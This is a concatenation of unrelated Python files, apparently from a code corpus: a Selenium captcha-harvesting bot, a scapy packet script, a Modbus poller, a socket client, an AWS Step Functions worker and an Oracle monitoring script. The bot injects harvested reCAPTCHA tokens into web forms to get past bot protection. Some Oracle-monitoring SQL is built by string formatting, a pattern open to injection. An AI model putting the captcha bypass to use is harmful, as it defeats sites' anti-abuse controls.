dir_list = get_dirs(path)
dir_list = split_list(dir_list, process_count)
process_l = list()
for i, dir in enumerate(dir_list):
p = Process(target=create_dcm_folder, args=(i, new_path, dir))
p.start()
process_l.append(p)
for p in process_l:
p.join()
print(f"time: {time.time() - start}")
|
example_bot.py
|
# Importing local packages
from browser import Browser
from harvester_manager import HarvesterManger
from harvester import Harvester
# Importing external packages
from selenium.webdriver.common.by import By
from selenium.common.exceptions import WebDriverException
# Importing standard packages
import time
import datetime
from threading import Thread
import random
import zipfile
class Bot(Browser):
def __init__(self, harvester_manager: HarvesterManger, delay: int = 0.1):
super(Bot, self).__init__()
self.harvester_manager = harvester_manager
self.delay = delay
self.control_element = f'controlElement{random.randint(0, 10 ** 10)}'
self.looping = False
def main_loop(self) -> None:
if not self.looping:
self.looping = True
while self.looping:
if self.is_open:
# Try except to be upgraded...
try:
self.tick()
except WebDriverException:
print('Some selenium exception (bot).')
time.sleep(self.delay)
def tick(self):
inject_list = (
f'document.getElementsByClassName("g-recaptcha")[0].insertAdjacentHTML("beforebegin", \'<div class="{self.control_element}"></div>\');',
f'document.getElementsByClassName(\'{self.control_element}\')[0].innerHTML = \'<span class="clicked_{self.control_element}"></span><input type="button" class="button_{self.control_element}" value="Click to inject captcha"><span class="description_{self.control_element}"></span><span class="timestamp_{self.control_element}"></span>\';',
f'document.getElementsByClassName(\'{self.control_element}\')[0].style.border = \'2px solid #333\';',
f'document.getElementsByClassName(\'{self.control_element}\')[0].style.borderRadius = \'20px\';',
f'document.getElementsByClassName(\'{self.control_element}\')[0].style.height = \'27px\';',
f'document.getElementsByClassName(\'{self.control_element}\')[0].style.marginBottom = \'5px\';',
f'document.getElementsByClassName(\'{self.control_element}\')[0].style.padding = \'0\';',
f'document.getElementsByClassName(\'{self.control_element}\')[0].style.overflow = \'hidden\';',
f'document.getElementsByClassName(\'clicked_{self.control_element}\')[0].style.display = \'none\';',
f'document.getElementsByClassName(\'timestamp_{self.control_element}\')[0].style.display = \'none\';',
f'document.getElementsByClassName(\'description_{self.control_element}\')[0].style.marginLeft = \'5px\';',
f'document.getElementsByClassName(\'button_{self.control_element}\')[0].style.boxSizing = \'border-box\';',
f'document.getElementsByClassName(\'button_{self.control_element}\')[0].onclick = function(){{document.getElementsByClassName("clicked_{self.control_element}")[0].innerHTML = "clicked";}};',
f'document.getElementsByClassName(\'button_{self.control_element}\')[0].style.borderRadius = \'20px\';',
f'document.getElementsByClassName(\'button_{self.control_element}\')[0].style.margin = \'0\';',
f'document.getElementsByClassName(\'button_{self.control_element}\')[0].style.padding = \'0\';',
f'document.getElementsByClassName(\'button_{self.control_element}\')[0].style.cursor = \'pointer\';',
f'document.getElementsByClassName(\'button_{self.control_element}\')[0].style.padding = \'5px\';',
f'document.getElementsByClassName(\'button_{self.control_element}\')[0].style.backgroundColor = \'#333\';',
f'document.getElementsByClassName(\'button_{self.control_element}\')[0].style.color = \'white\';',
f'document.getElementsByClassName(\'button_{self.control_element}\')[0].style.border = \'none\';'
)
if not self.execute_script(f'return document.getElementsByClassName("{self.control_element}")'):
for inject_html in inject_list:
self.execute_script(inject_html)
if not self.execute_script('return grecaptcha.getResponse();'):
self.execute_script(f'document.getElementsByClassName("button_{self.control_element}")[0].style.cursor = "pointer"')
self.execute_script(f'document.getElementsByClassName("{self.control_element}")[0].style.border = "2px solid #333"')
self.execute_script(f'document.getElementsByClassName(\'button_{self.control_element}\')[0].style.backgroundColor = \'#333\';', )
self.execute_script(f'document.getElementsByClassName("description_{self.control_element}")[0].innerHTML = "Captchas harvested: {len(self.harvester_manager.response_queue)}"')
if self.execute_script(f'return document.getElementsByClassName("clicked_{self.control_element}")[0].innerHTML;'):
self.execute_script(f'document.getElementsByClassName("button_{self.control_element}")[0].value = "Waiting for captcha"')
else:
self.execute_script(f'document.getElementsByClassName("button_{self.control_element}")[0].value = "Click to inject captcha"')
else:
now = datetime.datetime.now()
timestamp = self.execute_script(f'return document.getElementsByClassName("timestamp_{self.control_element}")[0].innerHTML;')
if timestamp:
timestamp_string = datetime.datetime.strptime(timestamp, '%Y-%m-%d %H:%M:%S.%f')
delta = now - timestamp_string
self.execute_script(f'document.getElementsByClassName("button_{self.control_element}")[0].value = "Captha injected"')
self.execute_script(f'document.getElementsByClassName("button_{self.control_element}")[0].style.cursor = "default"')
self.execute_script(f'document.getElementsByClassName("description_{self.control_element}")[0].innerHTML = "Captha expires in {120 - delta.seconds} seconds"')
self.execute_script(f'document.getElementsByClassName("{self.control_element}")[0].style.border = "2px solid green"')
self.execute_script(f'document.getElementsByClassName(\'button_{self.control_element}\')[0].style.backgroundColor = \'green\';', )
if self.execute_script(f'return document.getElementsByClassName("clicked_{self.control_element}")[0].innerHTML;'):
if self.execute_script('return grecaptcha.getResponse();') == '':
if len(self.harvester_manager.response_queue) > 0:
self.find_element(By.CLASS_NAME, 'g-recaptcha')
value = self.find_element(By.CLASS_NAME, 'g-recaptcha-response').text
if value == '' or self.execute_script('return grecaptcha.getResponse();') == '':
self.execute_script(f'document.getElementsByClassName("g-recaptcha-response")[0].value = "{self.harvester_manager.response_queue[0]["response"]}";')
self.execute_script(f'document.getElementsByClassName("timestamp_{self.control_element}")[0].innerHTML = "{self.harvester_manager.response_queue[0]["timestamp"]}";')
self.harvester_manager.response_queue.pop(0)
timestamp = self.execute_script(f'return document.getElementsByClassName("timestamp_{self.control_element}")[0].innerHTML;')
if timestamp:
now = datetime.datetime.now()
timestamp_string = datetime.datetime.strptime(timestamp, '%Y-%m-%d %H:%M:%S.%f')
delta = now - timestamp_string
if delta.seconds > 120:
self.execute_script(f'document.getElementsByClassName("g-recaptcha-response")[0].value = "";')
self.execute_script(
f'document.getElementsByClassName("timestamp_{self.control_element}")[0].innerHTML = "";')
self.execute_script(
f'document.getElementsByClassName("clicked_{self.control_element}")[0].innerHTML = "";')
# Example of using captcha harvester with example Bot class that is receiving captcha responses and using them to submit form.
# NOTE. This example uses 2 Harvester objects, 1 of them uses logging in to Google account and launching extra window with Youtube.
def main():
url = 'https://www.google.com/recaptcha/api2/demo'
# Scraping sitekey from url
sitekey = Harvester.get_sitekey(url)
# Creating HarvesterManager object
harvester_manager = HarvesterManger()
# Adding Harvester object to HarvesterManager object with url and sitekey as arguments
harvester_manager.add_harvester(Harvester(url=url, sitekey=sitekey))
# Adding Harvester object to HarvesterManager object with additional arguments to login to Google account and open window with Youtube.
harvester_manager.add_harvester(Harvester(url=url, sitekey=sitekey, log_in=True, open_youtube=True, proxy='ip:port:login:password'))
# Launching all harvesters
harvester_manager.start_harvesters()
# Creating Bot object with HarvesterManager as argument so it can reach its response_queue
bot = Bot(harvester_manager)
# Launching Bot
bot.start(url=url)
# Creating bot and harvester_manager main_loop threads
bot_loop_thread = Thread(target=bot.main_loop)
harvester_manager_loop_thread = Thread(target=harvester_manager.main_loop)
# Starting threads
bot_loop_thread.start()
harvester_manager_loop_thread.start()
# Joining threads
bot_loop_thread.join()
harvester_manager_loop_thread.join()
if __name__ == '__main__':
main()
|
server_based.py
|
#!/usr/bin/env python
import argparse
import sys
import socket
import random
import struct
import threading
import time
import thread
import json
from scapy.all import sendp, send, get_if_list, get_if_hwaddr
from scapy.all import Packet
from scapy.all import Ether, IP, UDP, TCP
from proposalHeader import GvtProtocol
from receive import *
TYPE_PROP = 0x1919
TYPE_REQ = 0x1515
TYPE_GVT = 0x600
TYPE_DEL = 0x1313
TYPE_PREPARE = 0x3333
TYPE_PREPAREOK = 0x4444
TYPE_STARTCHANGE = 0x4343
TYPE_STARTVIEW = 0x4747
TYPE_FAILURE = 0x5555
TYPE_DELFAILURE = 0x6666
TYPE_VIEWCHANGE = 0x700
TYPE_RESENDPROP = 0x1919
class gvtControl:
def __init__(self, dest_ip, pid):
#creates socket to a destination
self.addr = socket.gethostbyname(dest_ip)
self.iface = self.get_if()
self.pid = pid
self.dest_ip = dest_ip
self.GVT_value = 0
self.last_proposal = 0
self.last_proposal_time = 0
self.leader_alive = 1
self.sent_but_not_yet_acknowledged = 0
#interfaces
self.GVT_list = {}
self.queue = []
#start receiver thread
self.receivethread = threading.Thread(target=self.receiveThread)
self.receivethread.start()
#just for debugging
#start run loop
self.run_loop = threading.Thread(target=self.runThread)
self.run_loop.start()
self.send = threading.Thread(target=self.send_queue)
self.send.start()
self.list = ["10.0.1.1", "10.0.2.2", "10.0.4.4", "10.0.5.5", "10.0.6.6",
"10.0.7.7", "10.0.8.8", "10.0.9.9", "10.0.10.10", "10.0.11.11", "10.0.12.12",
"10.0.13.13", "10.0.14.14", "10.0.15.15", "10.0.16.16", "10.0.17.17", "10.0.18.18"]
def receiveThread(self):
#ifaces = filter(lambda i: 'eth' in i, os.listdir('/sys/class/net/'))
#iface = ifaces[0]
print "sniffing on %s" % self.iface
sys.stdout.flush()
sniff(iface = self.iface, prn = lambda x: self.handle_pkt(x))
#TODO: Change this interface after the failure
def handle_pkt(self, pkt):
if TCP in pkt and pkt[TCP].dport == 7777:
print "got a packet"
pkt.show2()
self.proposal = json.loads(pkt.load)
print self.proposal
self.compute_gvt(self.proposal)
sys.stdout.flush()
def compute_gvt(self, proposal):
key = proposal.keys()
self.GVT_list[key[0]] = proposal[key[0]]
minval = min(self.GVT_list.values())
for x in self.list:
print('O QUE TACONTECENDO')
self.send_packet(minval, self.pid, x)
def resend_old_messages(self):
#so esta mandando uma mensagem no momento
#TODO: armazenar e reenviar todas as mensagens da aplicacao
if(self.sent_but_not_yet_acknowledged):
self.send_packet(message_value=int(self.sent_but_not_yet_acknowledged), process_pid=self.pid)
def get_if(self):
self.ifs=get_if_list()
iface=None # "h1-eth0"
for i in get_if_list():
if "eth0" in i:
iface=i
break;
if not iface:
print "Cannot find eth0 interface"
exit(1)
self.ifs.remove('lo')
self.ifs.remove('eth0')
print(self.ifs)
return iface
def send_packet(self, message_value, process_pid, p_addr):
self.payload = {}
self.payload[process_pid] = message_value
pkt = Ether(src=get_if_hwaddr(self.iface), dst='ff:ff:ff:ff:ff:ff', type = 0x800)
pkt = pkt /IP(dst=p_addr) / TCP(dport=1234, sport=random.randint(49152,65535))/ json.dumps(self.payload)
sendp(pkt, iface=self.iface, verbose=False)
def build_proposal(self, proposal_value):
self.last_proposal = int(proposal_value)
self.send_packet(message_value=int(proposal_value), process_pid=self.pid)
#this thread implements a run loop. Just for writing LVT values as a debug functionality
def runThread(self):
while True:
value = input('Type new LVT:')
print "sending on interface %s to %s" % (self.iface, str(self.addr))
#TODO: We need to enforce the concurrency control here
self.queue.append([value, time.time()])
#self.last_proposal_time = time.time()
def send_queue(self):
#TODO: concurrency control
while True:
time.sleep(1)
if(self.sent_but_not_yet_acknowledged == 0 and len(self.queue) > 0):
get = self.queue.pop(0)
self.sent_but_not_yet_acknowledged = get[0]
print self.sent_but_not_yet_acknowledged
self.last_proposal_time = get[1]
self.build_proposal(proposal_value=self.sent_but_not_yet_acknowledged)
def main():
if len(sys.argv)<3:
#TODO: Does not make sense this Dest IP. Solve it
print 'pass 2 arguments: <destination_ip> <pid>'
exit(1)
GVTcontrol_instance = gvtControl(sys.argv[1], int(sys.argv[2]))
if __name__ == '__main__':
main()
|
modbus_poll.py
|
#!/usr/bin/env python
import argparse
import json
import logging
import threading
import sys
import signal
from time import sleep, time
from pymodbus.client.sync import ModbusTcpClient as ModbusClient
def poll_range(num, den):
ret = [den] * (num / den)
if num % den > 0:
ret.append(num % den)
return ret
def modbus_poller(id, stop_event, config):
log = logging.getLogger("worker-" + str(id))
log.setLevel(logging.DEBUG)
client = ModbusClient(host=config["address"], port=config["port"])
client.connect()
log.info("Worker started")
t_max = -1
while not stop_event.is_set():
log.info("Poller turn")
t0 = time()
address = 0
for i in poll_range(config["num_controls"], config["chunk_size"]):
result = client.read_input_registers(address=address, count=i, unit=1)
address += i
if result is not None:
if result.function_code >= 0x80 and result.function_code != 132:
log.warn("Server returned error!")
print result
stop_event.set()
break
elif result.function_code == 132:
print "Server fault: " + str(result)
sleep(1)
break
t = time() - t0
log.info("Request took " + str(t) + " s")
if t > t_max:
t_max = t
sleep(config["thread"]["interval"])
log.info("Worker shutting down")
log.info("Max worker process time: " + str(t_max))
client.close()
def validate_config(config):
ret = "address" in config and "port" in config and "num_threads" in config and "thread" in config
if ret:
thread = config["thread"]
ret = "actions" in thread and type(thread["actions"]) is list
ret = ret and "interval" in thread
return ret
class StopperHandler:
def __init__(self, event):
self.ev = event
def __call__(self, signum, frame):
print "Signal received"
self.ev.set()
def main():
# configure logging
logging.basicConfig()
log = logging.getLogger()
log.setLevel(logging.INFO)
# parse arguments
parser = argparse.ArgumentParser(description="Modbus TCP test and benchmark utility")
parser.add_argument("-c", "--config", help="poller config file", type=str, required=True)
parser.add_argument("-s", "--server", help="Modbus server address", type=str, required=True)
parser.add_argument("-p", "--port", help="Modbus server port", type=int, required=True)
parser.add_argument("-t", "--nthreads", help="Number of polling threads", type=int, required=True)
parser.add_argument("-f", "--fq", help="Polling frequency", type=float, required=True)
parser.add_argument("-n", "--ncontrols", help="Number of registers", type=int, required=True)
parser.add_argument("--chunk-size", help="Number of registers to read at once", type=int, default=50)
args = parser.parse_args()
# open config file
config = json.loads(open(args.config).read())
config["address"] = args.server
config["port"] = args.port
config["num_threads"] = args.nthreads
config["num_controls"] = args.ncontrols
config["chunk_size"] = args.chunk_size
if abs(args.fq) < 0.00001:
print >>sys.stderr, "Warning: limit frequency to 0.00001 Hz (10s interval)"
args.fq = 0.00001
config["thread"]["interval"] = 1 / args.fq
# check if all required fiels are here
# if not validate_config(config):
# print >>sys.stderr, "ERROR: Wrong config format"
# sys.exit(1)
# init threads and exit event
ev_exit = threading.Event()
# create signal handlers to stop
sighndlr = StopperHandler(ev_exit)
signal.signal(signal.SIGINT, sighndlr)
signal.signal(signal.SIGTERM, sighndlr)
threads = []
for i in range(config["num_threads"]):
threads.append(threading.Thread(target=modbus_poller, args=(i, ev_exit, config)))
# start threads
for i in range(len(threads)):
threads[i].start()
# just wait for stop event
while not ev_exit.is_set():
sleep(0.1)
log.info("Time to sleep, snakeys")
# join all threads
for i in range(len(threads)):
threads[i].join()
# that's all
if __name__ == "__main__":
main()
|
client.py
|
#!/usr/bin/env python3
'''
Server script for simple client/server example
Copyright (C) Simon D. Levy 2021
MIT License
'''
from threading import Thread
from time import sleep
import socket
from struct import unpack
from header import ADDR, PORT
def comms(data):
'''
Communications thread
'''
# Connect to the client
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((ADDR, PORT))
# Loop until main thread quits
while True:
# Receive and unpack three floating-point numbers
data[0], data[1], data[2] = unpack('=fff', sock.recv(12))
# Yield to the main thread
sleep(0.001)
def main():
# Create a list to receiver the data
data = [0, 0, 0]
# Start the client on its own thread
t = Thread(target=comms, args=(data,))
t.setDaemon(True)
t.start()
# Loop until user hits CTRL-C
while True:
try:
print('%3.3f %3.3f %3.3f ' % tuple(data))
sleep(.01)
except KeyboardInterrupt:
break
main()
|
server.py
|
import os
import logging
import boto3
import signal
import socket
import json
from http.server import HTTPServer
from http.server import BaseHTTPRequestHandler
from botocore.config import Config as BotoCoreConfig
from threading import Semaphore, Thread, Event
from multiprocessing import Pool
from .worker import init_worker, run_worker_task
logger = logging.getLogger('stefuna')
def activity_region(activity_arn):
"""
Return the region for an AWS activity_arn.
'arn:aws:states:us-east-2:123456789012:stateMachine:hello_world' => 'us-east-2'
"""
if activity_arn:
parts = activity_arn.split(':')
return parts[3] if len(parts) >= 4 else None
else:
return None
class Server(object):
worker_class = None
def __init__(self, name='StefunaWorker', activity_arn=None,
processes=None, heartbeat=0, maxtasksperchild=100,
server_config=None, worker_config=None, healthcheck=None, loglevel=None):
if Server.worker_class is None:
raise ValueError('Server.worker_class must be set to a Worker '
'subclass before creating a server instance.')
self.config = server_config
# Set the client region to the region in the arn
region = activity_region(activity_arn)
# get_activity_task uses long polling of up to 60 seconds.
# Client side socket timeout should be set to at least 65 seconds.
boto_config = BotoCoreConfig(read_timeout=70, region_name=region)
self.sf_client = boto3.client('stepfunctions', config=boto_config)
self.activity_arn = activity_arn
# Determine a server name based on hostname and pid.
host = None
try:
host = socket.gethostbyname(socket.gethostname())
except Exception:
pass
self.server_name = '{0}-{1}'.format(name, host if host is not None else os.getpid())
# Init the server before the workers are created.
self.init(server_config)
if processes is None:
processes = os.cpu_count()
logger.debug('Creating ServerManager %s with %d worker processes',
self.server_name, processes)
self.pool = Pool(processes=processes,
initializer=init_worker, initargs=(Server.worker_class,
worker_config, region,
heartbeat, loglevel),
maxtasksperchild=maxtasksperchild)
# We keep track of available workers with a semaphore. This allows
# us to only get a task from the activity queue when there is
# a worker available.
self.workers = Semaphore(processes)
self.stop_event = Event()
self.healthcheck_http_server = None
if healthcheck:
self._create_healthcheck(healthcheck)
# Handle signals for graceful shutdown
signal.signal(signal.SIGTERM, self._close_signal)
signal.signal(signal.SIGINT, self._close_signal)
def init(self, server_config):
"""Can be overridden in a subclass to initialize a server."""
pass
def run(self):
logger.debug('Run server')
# We use the local worker_ready flag here because
# get_activity_task() will sometimes return without
# a new task.
worker_ready = False
while not self.stop_event.is_set():
# We first acquire a worker and then wait for a task for it
# because we want to be able to always process a task
# immediately after we get it so we ensure a worker is ready.
if not worker_ready:
logger.debug('Acquiring worker')
self.workers.acquire() # blocks until worker available
worker_ready = True
response = self.sf_client.get_activity_task(
activityArn=self.activity_arn,
workerName=self.server_name
)
task_token = response.get('taskToken')
if task_token is not None and len(task_token) > 0:
input_str = response.get('input', '')
self.run_task(task_token, input_str)
worker_ready = False
self.stop_event.clear()
logger.debug('Server run complete')
self.pool.close()
logger.debug('Waiting for workers to finish')
self.pool.join()
logger.debug('Workers exited.')
def run_task(self, task_token, input_data):
"""Start a new task by sending message to worker process."""
logger.debug('Sending task to acquired worker')
self.pool.apply_async(run_worker_task, args=(task_token, input_data),
callback=self._task_ended)
def _task_ended(self, task_result):
"""Called once task is done, releases the worker."""
self.workers.release()
logger.debug('Released worker for task')
def _close_signal(self, signal=None, frame=None):
Thread(target=self.close, args=(), daemon=True).start()
def close(self):
"""
Signal the server run loop to stop.
"""
logger.info('Closing server. Waiting for run loop to end')
self.stop_event.set()
if self.healthcheck_http_server:
self.healthcheck_http_server.shutdown()
def _create_healthcheck(self, port):
class HealthcheckHTTPRequestHandler(BaseHTTPRequestHandler):
def do_GET(self):
health = {'status': 'ok'}
self.send_response(200)
self.send_header('Content-Type', 'application/json')
self.end_headers()
self.wfile.write(bytes(json.dumps(health), 'UTF-8'))
def log_message(self, format, *args):
logger.debug("Healthcheck from %s %s" % (self.address_string(), format % args))
self.healthcheck_http_server = HTTPServer(('', port), HealthcheckHTTPRequestHandler)
healthcheck_thread = Thread(target=self._run_healthcheck_thread,
name='healthcheck', args=(), daemon=True)
healthcheck_thread.start()
def _run_healthcheck_thread(self):
logger.info('Started healthcheck thread')
self.healthcheck_http_server.serve_forever()
self.healthcheck_http_server.server_close()
self.healthcheck_http_server = None
logger.info('Ended healthcheck thread')
|
check_oracle.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import os
import sys
import string
import time
import datetime
from subprocess import Popen, PIPE
import MySQLdb
import cx_Oracle
import logging
import logging.config
logging.config.fileConfig("etc/logger.ini")
logger = logging.getLogger("check_oracle")
path='./include'
sys.path.insert(0,path)
import functions as func
import wl_oracle as oracle
import alert_oracle as alert
import alert_main as mail
from multiprocessing import Process;
######################################################################################################
# function check_oracle
######################################################################################################
def check_oracle(host,port,dsn,username,password,server_id,tags):
url=host+':'+port+'/'+dsn
try:
conn=cx_Oracle.connect(username,password,url, mode=cx_Oracle.SYSDBA) #获取connection对象
except Exception, e:
logger_msg="check oracle %s : %s" %(url,str(e).strip('\n'))
logger.warning(logger_msg)
try:
connect=0
func.mysql_exec("begin;",'')
sql="delete from oracle_status where server_id = %s; " %(server_id)
func.mysql_exec(sql,'')
sql="insert into oracle_status(server_id,host,port,tags,connect) values(%s,%s,%s,%s,%s)"
param=(server_id,host,port,tags,connect)
func.mysql_exec(sql,param)
logger.info("Generate oracle instance alert for server: %s begin:" %(server_id))
alert.gen_alert_oracle_status(server_id) # generate oracle instance alert
logger.info("Generate oracle instance alert for server: %s end." %(server_id))
func.mysql_exec("commit;",'')
except Exception, e:
func.mysql_exec("rollback;",'')
logger.error(str(e).strip('\n'))
sys.exit(1)
finally:
sys.exit(1)
finally:
func.check_db_status(server_id,host,port,tags,'oracle')
try:
##func.mysql_exec('delete from oracle_redo where server_id = %s;' %(server_id),'')
#get info by v$instance
connect = 1
instance_name = oracle.get_instance(conn,'instance_name')
instance_role = oracle.get_instance(conn,'instance_role')
database_role = oracle.get_database(conn,'database_role')
db_name = oracle.get_database(conn,'name')
open_mode = oracle.get_database(conn,'open_mode')
protection_mode = oracle.get_database(conn,'protection_mode')
if database_role == 'PRIMARY':
database_role_new = 'm'
dg_stats = '-1'
dg_delay = '-1'
else:
database_role_new = 's'
#dg_stats = oracle.get_stats(conn)
#dg_delay = oracle.get_delay(conn)
dg_stats = '1'
dg_delay = '1'
instance_status = oracle.get_instance(conn,'status')
startup_time = oracle.get_instance(conn,'startup_time')
#print startup_time
#startup_time = time.strftime('%Y-%m-%d %H:%M:%S',startup_time)
#localtime = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime())
#uptime = (localtime - startup_time).seconds
#print uptime
uptime = oracle.get_instance(conn,'startup_time')
version = oracle.get_instance(conn,'version')
instance_status = oracle.get_instance(conn,'status')
instance_number = oracle.get_instance(conn,'instance_number')
database_status = oracle.get_instance(conn,'database_status')
host_name = oracle.get_instance(conn,'host_name')
archiver = oracle.get_instance(conn,'archiver')
#get info by sql count
session_total = oracle.get_sessions(conn)
session_actives = oracle.get_actives(conn)
session_waits = oracle.get_waits(conn)
#get snap_id, end_interval_time
snap_id = oracle.get_current_snap_id(conn, instance_number)
end_interval_time = oracle.get_end_interval_time(conn, instance_number)
#get info by v$parameters
parameters = oracle.get_parameters(conn)
processes = parameters['processes']
##get info by v$parameters
sysstat_0 = oracle.get_sysstat(conn)
time.sleep(1)
sysstat_1 = oracle.get_sysstat(conn)
session_logical_reads_persecond = sysstat_1['session logical reads']-sysstat_0['session logical reads']
physical_reads_persecond = sysstat_1['physical reads']-sysstat_0['physical reads']
physical_writes_persecond = sysstat_1['physical writes']-sysstat_0['physical writes']
physical_read_io_requests_persecond = sysstat_1['physical write total IO requests']-sysstat_0['physical write total IO requests']
physical_write_io_requests_persecond = sysstat_1['physical read IO requests']-sysstat_0['physical read IO requests']
db_block_changes_persecond = sysstat_1['db block changes']-sysstat_0['db block changes']
os_cpu_wait_time = -1
if version >= "11":
os_cpu_wait_time = sysstat_0['OS CPU Qt wait time']
logons_persecond = sysstat_1['logons cumulative']-sysstat_0['logons cumulative']
logons_current = sysstat_0['logons current']
opened_cursors_persecond = sysstat_1['opened cursors cumulative']-sysstat_0['opened cursors cumulative']
opened_cursors_current = sysstat_0['opened cursors current']
user_commits_persecond = sysstat_1['user commits']-sysstat_0['user commits']
user_rollbacks_persecond = sysstat_1['user rollbacks']-sysstat_0['user rollbacks']
user_calls_persecond = sysstat_1['user calls']-sysstat_0['user calls']
db_block_gets_persecond = sysstat_1['db block gets']-sysstat_0['db block gets']
# get flashback information
flashback_on = oracle.get_database(conn,'flashback_on')
#earliest_fbscn = oracle.get_earliest_fbscn(conn)
flashback_retention = parameters['db_flashback_retention_target']
flashback_earliest_time = oracle.get_earliest_fbtime(conn,flashback_retention)
#print "flashback_earliest_time: %s" %(flashback_earliest_time)
flashback_space_used = oracle.get_flashback_space_used(conn)
##################### insert data to mysql server#############################
func.mysql_exec("begin;",'')
func.mysql_exec("insert into oracle_status_his SELECT *,DATE_FORMAT(sysdate(),'%%Y%%m%%d%%H%%i%%s') from oracle_status where server_id = %s;" %(server_id),'')
func.mysql_exec('delete from oracle_status where server_id = %s;' %(server_id),'')
sql = "insert into oracle_status(server_id,host,port,tags,connect,db_name, instance_name,instance_role,instance_status,database_role,open_mode,protection_mode,host_name,database_status,startup_time,uptime,version,archiver,session_total,session_actives,session_waits,dg_stats,dg_delay,processes,session_logical_reads_persecond,physical_reads_persecond,physical_writes_persecond,physical_read_io_requests_persecond,physical_write_io_requests_persecond,db_block_changes_persecond,os_cpu_wait_time,logons_persecond,logons_current,opened_cursors_persecond,opened_cursors_current,user_commits_persecond,user_rollbacks_persecond,user_calls_persecond,db_block_gets_persecond,flashback_on,flashback_earliest_time,flashback_space_used) values(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s);"
param = (server_id,host,port,tags,connect,db_name,instance_name,instance_role,instance_status,database_role,open_mode,protection_mode,host_name,database_status,startup_time,uptime,version,archiver,session_total,session_actives,session_waits,dg_stats,dg_delay,processes,session_logical_reads_persecond,physical_reads_persecond,physical_writes_persecond,physical_read_io_requests_persecond,physical_write_io_requests_persecond,db_block_changes_persecond,os_cpu_wait_time,logons_persecond,logons_current,opened_cursors_persecond,opened_cursors_current,user_commits_persecond,user_rollbacks_persecond,user_calls_persecond,db_block_gets_persecond,flashback_on,flashback_earliest_time,flashback_space_used)
func.mysql_exec(sql,param)
func.update_db_status_init(server_id,'oracle',database_role_new,version,tags)
func.mysql_exec("commit;",'')
logger.info("Generate oracle instance alert for server: %s begin:" %(server_id))
alert.gen_alert_oracle_status(server_id) # generate oracle instance alert
logger.info("Generate oracle instance alert for server: %s end." %(server_id))
#check tablespace
func.mysql_exec("begin;",'')
func.mysql_exec("insert into oracle_tablespace_his SELECT *,DATE_FORMAT(sysdate(),'%%Y%%m%%d%%H%%i%%s') from oracle_tablespace where server_id = %s;" %(server_id),'')
func.mysql_exec('delete from oracle_tablespace where server_id = %s;' %(server_id),'')
tablespace = oracle.get_tablespace(conn)
if tablespace:
for line in tablespace:
sql="insert into oracle_tablespace(server_id,host,port,tags,tablespace_name,status,management,total_size,used_size,max_rate) values(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)"
param=(server_id,host,port,tags,line[0],line[1],line[2],line[3],line[4],line[5])
func.mysql_exec(sql,param)
logger.info("Generate tablespace alert for server: %s begin:" %(server_id))
alert.gen_alert_oracle_tablespace(server_id) # generate tablespace alert
logger.info("Generate tablespace alert for server: %s end." %(server_id))
func.mysql_exec("commit;",'')
else:
func.mysql_exec("rollback;",'')
#check diskgroup
func.mysql_exec("begin;",'')
func.mysql_exec("insert into oracle_diskgroup_his SELECT *,DATE_FORMAT(sysdate(),'%%Y%%m%%d%%H%%i%%s') from oracle_diskgroup where server_id = %s;" %(server_id),'')
func.mysql_exec('delete from oracle_diskgroup where server_id = %s;' %(server_id),'')
diskgroup = oracle.get_diskgroup(conn)
if diskgroup:
for line in diskgroup:
sql="insert into oracle_diskgroup(server_id,host,tags,diskgroup_name,state,type,total_mb,free_mb,used_rate) values(%s,%s,%s,%s,%s,%s,%s,%s,%s)"
param=(server_id,host,tags,line[0],line[1],line[2],line[3],line[4],line[5])
func.mysql_exec(sql,param)
logger.info("Generate diskgroup alert for server: %s begin:" %(server_id))
alert.gen_alert_oracle_diskgroup(server_id) # generate diskgroup alert
logger.info("Generate diskgroup alert for server: %s end." %(server_id))
func.mysql_exec("commit;",'')
else:
func.mysql_exec("rollback;",'')
##### get redo per hour
ora_redo = oracle.get_redo_per_hour(conn)
if ora_redo:
key_time=ora_redo[0]
redo_p_h=ora_redo[1]
else:
key_time = datetime.datetime.now().strftime('%Y-%m-%d %H')+':00'
redo_p_h=0
##################### insert data to mysql server#############################
sql = "select count(1) from oracle_redo where server_id='%s' and key_time='%s'; " %(server_id,key_time)
li_count = func.mysql_single_query(sql)
if li_count == 0:
sql = "insert into oracle_redo(server_id, key_time, redo_log) values(%s,%s,%s);"
param = (server_id, key_time, redo_p_h)
func.mysql_exec(sql,param)
else:
sql = "update oracle_redo set redo_log = %s, create_time = DATE_FORMAT(sysdate(),'%%Y%%m%%d%%H%%i%%s') where server_id = '%s' and key_time='%s'; " %(redo_p_h,server_id,key_time)
func.mysql_exec(sql,'')
##### get db time
sql = "select count(1) from oracle_db_time where server_id='%s' and snap_id='%s'; " %(server_id,snap_id)
li_count = func.mysql_single_query(sql)
if li_count == 0:
ora_dbtime = oracle.get_db_time(conn, snap_id, instance_number)
if ora_dbtime:
end_time=ora_dbtime[1]
db_time=ora_dbtime[2]
elapsed=ora_dbtime[3]
rate=ora_dbtime[4]
if rate < 0:
rate = 0
##################### insert data to mysql server#############################
sql = "insert into oracle_db_time(server_id, snap_id, end_time, db_time, elapsed, rate) values(%s,%s,%s,%s,%s,%s);"
param = (server_id, snap_id, end_time, db_time, elapsed, rate)
func.mysql_exec(sql,param)
##### insert total session, active session into table "oracle_session" for big view
sql = "select count(1) from oracle_session where server_id='%s' and snap_id='%s'; " %(server_id,snap_id)
li_count = func.mysql_single_query(sql)
if li_count == 0:
sql = "insert into oracle_session(server_id, snap_id, end_time, total_session, active_session) values(%s,%s,%s,%s,%s);"
param = (server_id, snap_id, end_interval_time, session_total, session_actives)
func.mysql_exec(sql,param)
#check restore point
restore_point = oracle.get_restorepoint(conn, flashback_retention)
if restore_point:
func.mysql_exec("begin;",'')
func.mysql_exec('delete from oracle_flashback where server_id = %s;'%(server_id),'')
for line in restore_point:
sql="insert into oracle_flashback(server_id,host,port,tags,name) values(%s,%s,%s,%s,%s)"
param=(server_id,host,port,tags,line[0])
func.mysql_exec(sql,param)
func.mysql_exec("commit;",'')
# auto create restore point for standby database
if database_role == 'PHYSICAL STANDBY' and flashback_on == 'YES':
logger.info("Automatic create restore point for server:" + str(server_id))
create_restore_point(conn, flashback_retention)
